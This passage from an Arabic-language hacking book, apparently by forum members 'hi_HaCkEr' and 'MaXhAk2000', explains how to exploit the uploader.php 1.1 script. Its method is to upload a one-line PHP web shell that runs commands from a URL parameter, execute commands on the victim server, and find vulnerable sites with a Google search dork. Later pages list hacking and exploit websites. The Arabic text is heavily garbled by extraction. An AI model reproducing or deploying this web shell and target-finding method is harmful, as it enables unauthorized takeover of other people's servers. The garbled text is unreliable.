‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫"‬ ‫" ﺷﺮح ﺛﻐﺮة ‪uploader.php‬‬

‫‪$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪Hi_HaCkEr:‬‬
‫‪$$$$$$$$$$$$$$‬‬

‫ﺘﻰ‬
‫ﺘﻮﻓ ﺮﺑﺎﺻﺪارة ‪ ١٫١‬ﻮﺗﺴﻤﺢﻟﻚﺑ ﺮﻓﻊاي ﻣﻠ ﻒاو ﺣ‬
‫ﻫﻲﺛﻐ ﺮةﻓﻲﺑ ﺮﻧﺎﻣ ﺞ ‪ uploader.php‬ﻮﻫﻮ ﻣ‬
‫ﺘﺎ ت ‪php‬‬ ‫ﺳﻜ ﺮﺑ‬

‫ﺘﻄﯿﻊﺗ ﺤﻤﯿﻠﻪ ﻣﻦ ‪http://www.phpscriptcenter.com/uploader.php‬‬


‫ﻮﺗﺴ‬

‫ﻗﻌﻚ ﻣﺒﺎﺷ ﺮةﻟﻜﻦ ))ﺑﻮﺟﻮدﺑﺎﺳﻮرد ((‬


‫ﺘ ﻀﺢﺑﺎﻧﻪ ﯾﻌﻄﯿﻚ ﻣﯿﺰة رﻓﻊ ﻣﻠﻔﺎ تﻟﻤﻮ‬
‫ﺎﻻﺳﻜ ﺮﺑ ﺖ ﻣﻦ ﺎﺳﻤﻪ ﯾ‬

‫ﻃﯿﺐاذاﻟﻢ ﯾﻜﻦ ﻣ ﺤﻤﻰﺑﺒﺎﺳﻮورداذااﻟﺴﯿ ﺮﻓ ﺮﻛﻠﻪ ﺳﯿﺼﺒﺢﺗ ﺤ ﺖ ﺳﯿﻄﺮﺗﻚاذاﻟﻢ ﯾﻜﻦﻓﻲ ﺣﺎﻟﺔ‬


‫ﻗﻊﻓﻘﻂ ﺳﯿﺼﺒﺢﺗ ﺤ ﺖ ﺳﯿﻄﺮﺗﻚ‬‫‪safe_mode‬ﺎﻣﺎاذاﻛﺎن ﺳﯿ ﻒ ﻣﻮدﻓﺎﻟﻤﻮ‬
‫ﺘﻄﯿﻊ ﻋﻤ ﻞ ذﻟﻚ ﻣﻦ ﻣﻠ ﻒ ‪setup.php‬‬‫ﺘﻐﯿﯿ ﺮاﻟﺒﺎﺳﻮورد وﺗﺴ‬‫ﻗﻌﻚﻓﻘﻢﺑ‬‫ﺎذا ﺣﻤﻠ ﺖ ﺎﻟﻤﻠ ﻒﻟﻤﻮ‬

‫ﺘﻌ ﺮ ض ﻫﺬا ﺎﻻﻋﺪادا ت‬ ‫ﺘﺢاﻟﻤﻠ ﻒ واﺳ‬ ‫‪open setup.php and edit these options‬ﺎﻓ‬
‫‪--------------------------------------------------------------------------------------‬‬
‫‪$ADMIN[RequirePass] = "Yes"; // Checks to see if upload has a vaild‬‬
‫‪password‬‬
‫‪$ADMIN[Password] = "password"; // This is the password if the above‬‬
‫ﺘﻐﯿﯿ ﺮاﻟﺒﺎﺳﻮورد ﻣﻦﻫﻨﺎااا‬ ‫ﻗﻢﺑ‬
‫‪option is Yes‬‬
‫‪$ADMIN[UploadNum] = "5"; // Number of upload feilds to put on the‬‬
‫‪html‬ﻋﺪداﻟﻤﻠﻔﺎ ت‬
‫‪page‬‬
‫‪$ADMIN[directory] = "uploads"; // The directory the files will be‬‬
‫)‪uploaded to (must be chmoded to 777‬ﺎﺳﻢ ﻣﺠﻠﺪ ﺎﻟﻤﻠ ﻒاﺗ ﺮﻛﻪﻛﻤﺎ ﻫﻮاو ﻏﯿ ﺮهﻓﻠﻚ‬
‫اﻟﺨﯿﺎر‬
‫‪----------------------------------------------------------------------------------------‬‬

‫ﺘﻄﯿﻊﺗ ﺤﻤﯿ ﻞاي ﻣﻠ ﻒ وﺳﯿﻜﻮنﺑﺪا ﺧ ﻞ ﻣﺠﻠﺪ‪uploads‬‬


‫ﺘﺴ‬‫ﻃﺒﻌﺎانﻟﻢ ﯾﻜﻦاﻟﻤﻠ ﻒ ﻣ ﺤﻤﻲﺑﺒﺎﺳﻮوردﻓ‬
‫ﻓﺎذا رﻓﻌﻨﻬﺎ ﻣﺜﻼ ﻫﺬااﻻﺳﻜ ﺮﺑ ﺖ‬

‫‪<?php‬‬
‫;]"‪$cmd = $_GET["cmd‬‬
‫;)"‪system("$cmd‬‬
‫>?‬
‫ﺘﻄﯿﻊﺗﻨﻔﯿﺬاواﻣ ﺮ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ ‪...... etc‬‬
‫ـ ‪ cmd‬ﻮﻧﺴ‬
‫ﺳﻨﺼ ﻞﻟﻠ‬
‫ﻓﺎذا ﻧﻔﺬﻧﺎ‬

‫‪٢ ٥٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪http://www.victim.com/uploads/shellemul.php?cmd=id‬‬
‫ﺳﯿﻜﻮن ﺎﻟﻨﺎﺗ ﺞ ﻣﺜﻼ‬
‫)‪uid=21(apache) gid=21(apache) groups=21(apache‬‬

‫ﺘﻊ )انﻟﻢ‬
‫ﺘﻤ‬‫ﺛ ﻞﻟﻪ واﺳ‬
‫ﻃﺒﻌﺎﻫﺬا ﺳﻜ ﺮﺑ ﺖﺑﺴﯿﻂ وﻟﻤﺰﯾﺪ ﻣﻦاﻟ ﺮﻓﺎﻫﯿﺔارﻓﻊ ﺳﻜ ﺮﺑ ﺖاﻟﺸ ﻞاواي ﺳﻜ ﺮﺑ ﺖ ﻣﻤﺎ‬
‫ﯾﻜﻦاﻟﺴﯿ ﺮﻓ ﺮﻓﻲ ﺣﺎﻟﺔ ﺳﯿ ﻒ ﻣﻮد(‬

‫ﻃ ﺮﯾﻘﺔاﻟﺒ ﺤﺚ ﻋﻦ ﻫﺬهاﻟﺜﻐ ﺮة‬

‫ﺘﺒﻌﺎﻫﺬهاﻟﻄ ﺮﯾﻘﺔ‬
‫ﺎﺑ ﺤﺚﻓﻲ ﺟﻮﺟ ﻞ ﻣ‬
‫‪allinurl: uploader.php‬‬
‫ﺘﺎﺋ ﺞ‬
‫ﺘ ﺮىاﻟﻨ‬
‫ﻮﺳ‬

‫ﺘﺎﻣﺎاﺗﻤﻨﻰان ﯾﻜﻮناﻟﻤﻮ ﺿﻮ ع ﻣﻔﯿﺪاﻟﻠﺠﻤﯿﻊ ‪.........‬‬


‫ﻮﺧ‬

‫‪٢ ٥٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" أﻓﻀﻞ اﳌﻨﺘﺪﯾﺎت اﻟﻌﺮﺑﯿﺔ ﻟﻠﻬﺎﻛﺮ "‬

‫‪$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪MaXhAk2000:‬‬
‫‪$$$$$$$$$$$$$$$$‬‬

‫ﺘﻲ‪:::‬‬
‫ﺘﻪ ﻋﻠﻰ ﺣﺪ ﻣﻌ ﺮﻓ‬
‫ﺘﺪﯾﺎ تاﻟﻌ ﺮﺑﯿﺔﻓﻲ ﻣﺠﺎ لاﻟﻬﺎكﺑﺠﻤﯿﻊ ﻣﺠﺎﻟ‬
‫ﻗﻊ واﻟﻤﻨ‬
‫ﻗﺪﻟﻜﻢأﻓ ﻀ ﻞاﻟﻤﻮا‬
‫أ‬

‫ﺘﺪﯾﺎ تاﻟﻌﺎﺻﻔﺔ ) ﻣﻨﻈﻤﺔ ﻫﺎيﻫﻜ ﺮ ( ‪http://www.3asfh.com/vb‬‬‫‪ .١‬ﻣﻨ‬


‫ﺘﺪى ﺷﺒﻜﺔاﻟ ﺤﺰماﻹﺳﻼﻣﯿﺔ‪http://www.7azm.net/vb/ .‬‬ ‫‪ .٢‬ﻣﻨ‬
‫ﺘﺪىاﺑﻦ ﻣﺼ ﺮ‪http://www .ebnmasr.net/vb/ .‬‬ ‫‪ .٣‬ﻣﻨ‬
‫ﺘﺪىاﻟﻌﻘ ﺮباﻷ ﺣﻤ ﺮ ‪http://www.redstaing.ocm‬‬ ‫‪ .٤‬ﻣﻨ‬
‫ﺘﺪىإﻋﺼﺎر‪http://www .e3sar.com/vb/ .‬‬ ‫‪ .٥‬ﻣﻨ‬
‫ﺘﺰ ﻧ ﺖ‪http://www .emoataz.com/vb/ .‬‬ ‫ﺘﺪى ﻣﻌ‬‫‪ .٦‬ﻣﻨ‬
‫ﺘﺪىﻫﺎﻛ ﺮﻓﻠﺴﻄﯿﻦ‪http://www.h4palestine.com/ .‬‬ ‫‪ .٧‬ﻣﻨ‬
‫ﻗﻊ ‪http://www.pharaonics.net/‬‬ ‫‪ .٨‬ﻣﻮ‬
‫ﺘﺪى ﻧﺠﻢ دوس‪http://www.naajm.com/vb .‬‬ ‫‪ .٩‬ﻣﻨ‬
‫ﺘﺪىاﻣﺒ ﺮا ﻃﻮرﯾﺔاﻟﻌ ﺮب ‪http://www.arabse.net/forums/‬‬ ‫‪ .١٠‬ﻣﻨ‬

‫ﺘﻲﺗﺪﻋﻢ ﻋﻠﻢاﻟﻬﺎك‪...‬‬
‫ﻗﻊاﻟﻌ ﺮﺑﯿﺔاﻟ‬
‫ﺘﻪ ﻋﻦاﻟﻤﻮا‬
‫ﺘﻪ وﺗﺼﻔ ﺤ‬
‫ﻫﺬهاﻓ ﻀ ﻞ ﻣﺎرأﯾ‬

‫‪٢ ٥٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" أﻓﻀﻞ ﻣﻮاﻗﻊ اﻷﻣﻦ واﳍﺎك اﻹﳒﻠﯿﺰﯾﺔ "‬

‫‪$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪MaXhAk2000:‬‬
‫‪$$$$$$$$$$$$$$$$‬‬

‫ﺘﺨﺪﻣﻬﺎاﻟﻬﻜ ﺮﻟﻤﻌ ﺮﻓﺔا ﺧ ﺮ ﺎﻟﺜﻐ ﺮا تاﻟﺼﺎدره ﻣﻊ ﻣﻘﺎﻻ تﺑﺴﯿﻂﻟﻬﺬه‬ ‫ﺘﻲ ﯾﺴ‬‫ﻗﻊاﻟﻤﻬﻤﺔاﻟ‬ ‫ﻫﺬهﺑﻌ ﺾاﻟﻤﻮا‬
‫ﻗﻊ‬ ‫اﻟﻤﻮا‬
‫ﻗﻊ‪Packet Storm Security‬‬ ‫ﻣﻮ‬
‫‪----------------------‬‬
‫ﺎﻟﻌﻨﻮان ‪http://packetstorm.securify.com/ :‬‬
‫ﺘﻌﻠﻘﺔﺑﺎﻷﻣﻦ‬ ‫ﺘﻲﺗ ﺤﻤ ﻞﻛﻌﻠﻮﻣﺎ ت ﻣ‬‫ﻮا ﺣﺪ ﻣﻦاﻛﺒ ﺮﻗﻮاﻋﺪ ﺎﻟﺒﯿﺎﻧﺎ تاﻟ‬
‫ﻗﻊ ﻣ ﺮهﻓﻲاﻟﯿﻮمﻟﻘ ﺮا ءةﻗﺴﻢ '‪ 'New Files Today‬ﺳﻮا ءاﻟﻠﺒ ﺤﺚ ﻋﻦ‬ ‫ﺎﻧﺎاﻓ ﻀ ﻞاﻟﺬﻫﺎباﻟﻰﻫﺬااﻟﻤﻮ‬
‫ﺛﻐ ﺮا ت ﻣﻌﯿﻨﻪاوﻷ‪.‬‬
‫ﺘﻬﻠﻚ ﻣﺌﺎ تاﻻﻟﻮ ف ﻣﻦاﻟﻨﻘ ﺮا تﻛ ﻞ‬
‫ﻗﻊ ﯾﺴ‬
‫ﺎوﺟﺪ ﺎﻻرﺷﯿ ﻒ ﻋﻦ ﻃ ﺮﯾ ﻖ ‪ Ken Williams‬ﺣﯿﺚان ﻫﺬااﻟﻤﻮ‬
‫ﺎﺳﺒﻮ ع‬
‫ﺘﻪاﻟﻰ ﻣﺎﻟﻚ ) ‪(.http://www .securify.com/ Kroll-O-Nagra‬‬ ‫ﺘﻘﻠ ﺖ ﻣﻠﻜﯿ‬
‫ﺣﺎﻟﯿﺎاﻧ‬

‫ﻗﻊ‪Security Focus‬‬ ‫ﻣﻮ‬


‫‪----------------‬‬
‫ﺎﻟﻌﻨﻮان ‪http://www.securityfocus.com/ :‬‬
‫ﻗﻊ ﻻ ﯾﻨﺎﻣﻮناﺑﺪا!‬ ‫ﺘ ﺤﺪ ث ﯾﻮﻣﯿﺎﻓﻬﺆﻻ ءاﻟﺸﺒﺎباﻟﻘﺎﺋﻤﻮن ﻋﻠﻰ ﻫﺬااﻟﻤﻮ‬ ‫ﻗﺎﻋﺪةﺑﯿﺎﻧﺎ تا ﺧ ﺮىﻛﺎﻣﻠﺔ ‪.‬ﺗ‬
‫‪BugTraq‬‬
‫‪--------‬‬
‫ﻗﻊ) ‪ ,( http://www .securityfocus.com/ Security Focus‬ﻮﺳﺎﺑﻘﺎ‬ ‫ﺘ ﻀﯿﻔﻪ ﻣﻮ‬‫ﺎﻟﻌﻨﻮان ‪ :‬ﻣﺴ‬
‫ﺘ ﻀﯿﻔﺔ ) ‪.(http://www .netspace.org/ (Netspace‬‬ ‫ﻛﺎن ﻣﺴ‬
‫ﺘ ﺮوﻧﻲ‬‫ﺘﻢﺑﺎﻻﻣﻦاﻻﻟﻜ‬ ‫ﺘﻬ‬‫ﺘﻲﺗ‬‫‪BugTraq‬ﻮا ﺣﺪة ﻣﻦاﻓ ﻀ ﻞﻗﺎﺋﻤﺔ ﺎﻟﻤ ﺮاﺳﻼ تاﻟﺒ ﺮﯾﺪﯾﺔ ‪ mailing list‬ﺎﻟ‬
‫ﺘﻘﺒ ﻞاﻟ ﺮﺳﺎﺋ ﻞ‬‫ﻫﺬهاﻟﻘﺎﺋﻤﺔ ﯾﻘﻮم ﻋﻠﯿﻬﺎ رﺋﯿ ﺲاﺳﻤﻪ ‪ Aleph1 (aleph1@underground.org).‬ﯾﺴ‬
‫ﺘﻲﻟﯿ ﺲﻟﻬﺎ‬ ‫ﺘ ﺤﻠﯿﻠﻬﺎ وﺗﻨ ﻀﯿﻔﻬﺎ ﻣﻦا ل ‪spams‬ﻮاﻟ ﺮﺳﺎﺋ ﻞاﻟ‬‫ﺘﻲﺗ ﺮﺳﻠﻬﺎ ( ﻋﻦﺛﻐ ﺮة ﻣﻌﯿﻨﻪ ﻣﺜﻼ ( وﯾﻘﻮمﺑ‬ ‫اﻟ‬
‫ﺘ ﺮﻛﯿﻦﻓﻲاﻟﻘﺎﺋﻤﺔ‬ ‫ﺘﺎزهﻓﻘﻂاﻟﻰ ﺟﻤﯿﻊاﻟﻤﺸ‬ ‫ﻓﺎﺋﺪةاواﻟﺜﻐ ﺮا تاﻟﻘﺪﯾﻤﺔﺛﻢ ﯾﻘﻮمﺑﺈرﺳﺎ لاﻟ ﺮﺳﺎﻟﻪاﻟﻤﻤ‬
‫ﺘﺴﺠﯿ ﻞ ‪http://www.securityfocus.com/‬‬ ‫ﺎﻧﺼ ﺤﻚﺑﺎﻟ‬
‫ﻗﻊ‬ ‫ﺘﺒ ﺮﻟﺪي ﻣﻦاﻓ ﻀ ﻞﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ ت وذﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ د ﺧﻮ لاﻟﻤﻮ‬ ‫ﺘﻲﺗﻌ‬ ‫ﺘﻄﯿﻊاﯾ ﻀﺎاﻟﺒ ﺤﺚﻓﻲارﺷﯿﻔﺎﺗﻬﺎاﻟ‬ ‫ﺗﺴ‬
‫ﺛﻢ ﺎﻟﺒ ﺤﺚ ﻋﻦ راﺑﻂ'‪'search‬‬

‫ﺎﻟﺒ ﺤﺚ‪Searching‬‬
‫‪------------‬‬
‫ﺘﺎﺑ ﺖ‬
‫ﺘﺎجﻟﻜ‬
‫ﺘﺤ‬‫ﺘﻌﻠﻘﺔﺑﺨﺪﻣﻪ ﻣﻌﯿﻨﺔ ﻣﺜﻼ ‪Sendmail 8.8.3‬ﻓﺴ‬ ‫ﺎذاﻛﻨ ﺖﺗ ﺮﯾﺪ ﺎﻟﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮة ﻣ‬
‫'‪'sendmail 8.8.3‬ﻮاذاارد تاﻟﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮه ﻣﻌﯿﻨﻪ ﻣﺜﻼ ﻫﺠﻮم ﺣﺠﺐاﻟﺨﺪﻣﻪ ‪ local DoS‬ﺿﺪاي‬
‫ﻧﺴﺨﻪ ﻣﻦ ‪sendmail‬‬
‫ﺘﺒﺎس‪.‬‬
‫ﻗ‬‫ﺘﺎﻟﻲ '‪: 'local DoS sendmail‬ﺑﺪون ﻋﻼﻣﺎ ت ﺎﻻ‬ ‫ﺘﺎﺑ ﺖاﻟ‬
‫ﻓﻤﺎ ﻋﻠﯿﻚاﻻﻛ‬

‫ﻗﻊاﻻ ﺧ ﺮى‪:::‬‬
‫وﻫﺬهﺑﻌ ﺾاﻟﻤﻮا‬

‫‪٢ ٥٧‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

http://rootshell.redi.tk/ ‫ﻗﻊ‬
‫ﻣﻮ‬ .١
http://www.ussrback.com ‫ﻗﻊ‬ ‫ﻣﻮ‬ .٢
http://www .insecure.org/sploits.html ‫ﻗﻊ‬ ‫ﻣﻮ‬ .٣
http://www.linux.com.cn/hack.co.za ‫ﻗﻊ‬ ‫ﻣﻮ‬ .٤

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
=
‫ﻗﻊ‬
‫ وﻫﺬهاﻟﻤﻮا‬،‫ﺘﻲﺑﻬﺎ ﺿﺌﯿﻠﺔﻟﻌﺪمﺗﻮﺳﻌﻲﻓﻲاﻟﻠﻐﺔاﻹﻧﺠﻠﯿﺰﯾﺔ‬ ‫ﻗﻊاﻟﻬﺎكاﻹﻧﺠﻠﯿﺰﯾﺔﻓﻤﻌ ﺮﻓ‬
‫أﻣﺎﺑﺎﻟﻨﺴﺒﺔﻟﻤﻮا‬
:::‫ﺘﺎﻟﻲ‬
‫ﻛﺎﻟ‬
http://www.haker.com.pl ‫ﻗﻊ‬ ‫ ﻣﻮ‬.١
http://www .webattack.com/ ‫ﻗﻊ‬ ‫ ﻣﻮ‬.٢
http://blacksun.box.sk ‫ﻗﻊ‬ ‫ ﻣﻮ‬.٣
http://www .blackcode.com ‫ﻗﻊ‬ ‫ ﻣﻮ‬.٤
...

٢ ٥٨
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺎﻟﺨﺎﺗﻤﺔ‬
‫ﺘﺎب واﻟﺬي ﻻﻧ ﺮﺟﻮا ﻣﻦ ورا ءهاﻻاﻟﺨﯿ ﺮ واﻟﺜﻮاب‬
‫ﻧ ﺤﻤﺪا ﷲ وﻧﺸﻜ ﺮه ﻋﻠﻰان وﻓﻘﻨﺎ ﻹﺗﻤﺎم ﻫﺬااﻟﻜ‬
‫ﻓﻼﺗﻨﺴﻮﻧﺎ ﻣﻦ دﻋﻮةﻓﻲ ﻇﻬ ﺮاﻟﻐﯿﺐﻟﻨﺎ وﻹ ﺧﻮاﻧﻨﺎاﻟﻤﺴﻠﻤﯿﻦﻓﻲﻛ ﻞ ﻣﻜﺎن‪.‬‬

‫ﺘﻮي ﻋﻠﻰ ﺷ ﺮو حﻟﻠﺜﻐ ﺮا ت وﻣﻦﻫﺬااﻟﻘﺎﺑﯿ ﻞ‬‫ﺘﺎب ﻻ ﯾ ﺤ‬ ‫ﻟﻜﻦ ﻧﻨﻮه ﻫﻨﺎاﻟﻼ ﺷﻲ ءﻗﺪ ﯾﻘﻮ لاﻟﺒﻌ ﺾ ﻫﺬااﻟﻜ‬
‫ﺘﻬﻰ‬ ‫ﺘﺄﺳﯿ ﺲ وﻣﻦﺛﻢ ﯾﻨﻄﻠ ﻖاﻟﺸﺨ ﺺﻓﻲﻫﺬااﻟﻌﻠﻢاﻟﺬي ﻻ ﯾﻨ‬ ‫ﻟﻜﻦ ﻧﻘﻮ ل ﻧ ﺤﻦأﻧﻪ ﯾﺠﺐﻓﻲاﻟﺒﺪاﯾﺔاﻟ‬
‫ﻗﯿﻌﺎﻟﻜﻦ ﺷ ﺮ ﺣﻨﺎﺑﻌ ﻀﻬﺎ ﻣﻦأﺟ ﻞﺑﺎب‬ ‫ﺘﻢﺗ ﺮ‬‫ﺘﻬﻲ وﯾ‬
‫ﻗ ﺖ ﻣ ﺤﺪد وﺗﻨ‬‫وﯾﻔﻘﻪ ﻧﻔﺴﻪﺑﻨﻔﺴﻪ‪ ،،‬وأﯾ ﻀﺎأناﻟﺜﻐ ﺮا تﻟﻬﺎ و‬
‫ﺘﻔﺎدة ﻻ ﻏﯿ ﺮ‪...‬‬
‫اﻟﻌﻠﻢﺑﺎﻟﺸﻲ ء وﻟ ﻺﺳ‬

‫ﺘﺎر ﻣ ﺤﻤﺪاﺑﻦ ﻋﺒﺪا ﷲ ﻋﺪد ﻣﺎﺗ ﺮاﻛﻤ ﺖاﻟﺴ ﺤﺐ وﻋﺪد ﻣﺎﺗﺰا ﺧ ﺮ تاﻟﻨﺠﻮم ‪...‬‬
‫ﻫﺬا و ﺻﻠﻰا ﷲ ﻋﻠﻰاﻟﻨﺒﻲاﻟﺨ‬

‫واﻟﺴﻼم ﻋﻠﯿﻜﻢ ور ﺣﻤﺔا ﷲ وﺑ ﺮﻛﺎﺗﻪ‪،،،‬‬

‫‪++++++++++++++++++++++++‬‬
‫ﺘﻔﺴﺎرأو ﻧﺼﯿ ﺤﻪ ﯾ ﺮﺟﻰ ﻣ ﺮاﺳﻠﺔ‪+ -:‬‬
‫أياﺳ‬
‫‪+‬‬ ‫‪Hi_hacker@hotmail.com‬‬
‫‪+ Maxhak2000@hotmail.com‬‬
‫‪++++++++++++++++++++++++‬‬

‫‪٢ ٥٩‬‬

You might also like